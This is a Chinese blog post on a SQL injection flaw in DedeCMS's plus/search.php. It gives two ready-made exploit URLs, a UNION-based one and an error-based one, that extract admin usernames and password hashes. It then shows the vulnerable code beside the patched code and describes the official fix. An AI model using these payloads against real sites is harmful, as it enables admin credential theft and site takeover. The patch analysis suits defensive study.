织梦DEDE的最近出的一高危漏洞,search.php注入漏洞;估计目前大量黑阔都很爱织梦DEDE,由于常常有各种漏洞爆出.大量借助起来也都很容易.下面是漏洞的详细借助细则:0×1:http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a显示错误假如为:Safe Alert: Request Error step 2 !则借助以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a0×2:http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a显示错误假如为:Safe Alert: Request Error step 1 !则借助以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a漏洞修复:20130115常规安全更新include/arc.searchview.class.php, 搜索功能准确度优化member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患plus/search.php, 修复搜索功能存在的安全隐患登录织梦CMS后台会有提示,更新即可。不过貌似官方没有提供安全更新补丁的下载地址,找了半天没找到~漏洞剖析:存在漏洞的文件/plus/search.php//引入栏目缓存并看关键词是不是有有关栏目内容require_once($typenameCacheFile);if(isset($typeArr) && is_array($typeArr)){foreach($typeArr as $id=>$typename){$keywordn = str_replace($typename, ‘ ‘, $keyword);if($keyword != $keywordn){$keyword = $keywordn;$typeid = $id; //对ID没做任何过滤 造成注入break;}}}}$keyword = addslashes(cn_substr($keyword,30));修复之后//引入栏目缓存并看关键词是不是有有关栏目内容require_once($typenameCacheFile);if(isset($typeArr) && is_array($typeArr)){foreach($typeArr as $id=>$typename){//$keywordn = str_replace($typename, ‘ ‘, $keyword);$keywordn = $keyword;if($keyword != $keywordn){$keyword = HtmlReplace($keywordn);//防XSS$typeid = intval($id); //强制转换为数字型break;}}}}$keyword = addslashes(cn_substr($keyword,30));(责任编辑:酱油妹)
织梦search.php,织梦DEDE plus/search.php注入漏洞修复及借助
最新推荐文章于 2023-04-11 00:07:04 发布
本文详细介绍了织梦DEDE CMS的search.php注入漏洞,包括漏洞利用步骤和示例。该漏洞允许恶意用户通过精心构造的URL进行数据库注入攻击。官方已发布安全更新,修复了search.php及member/myfriend_group.php的安全隐患,但未提供补丁下载。修复措施包括对ID进行过滤和类型转换,以防止XSS和SQL注入。
519
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
